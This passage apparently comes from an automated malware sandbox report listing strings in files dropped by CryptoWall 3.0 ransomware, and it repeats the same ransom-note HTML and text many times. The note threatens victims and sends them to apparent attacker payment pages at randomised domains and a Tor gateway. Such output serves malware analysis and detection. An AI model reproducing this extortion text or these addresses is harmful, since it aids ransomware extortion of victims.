for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt374.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt83.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt418.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html154.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html127.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html394.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html239.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt405.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt391.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt5.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt123.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt81.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html408.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt305.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt210.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html391.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt159.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt148.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt283.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt27.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt335.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html109.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html17.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt76.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt132.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html64.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html389.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt272.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html409.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
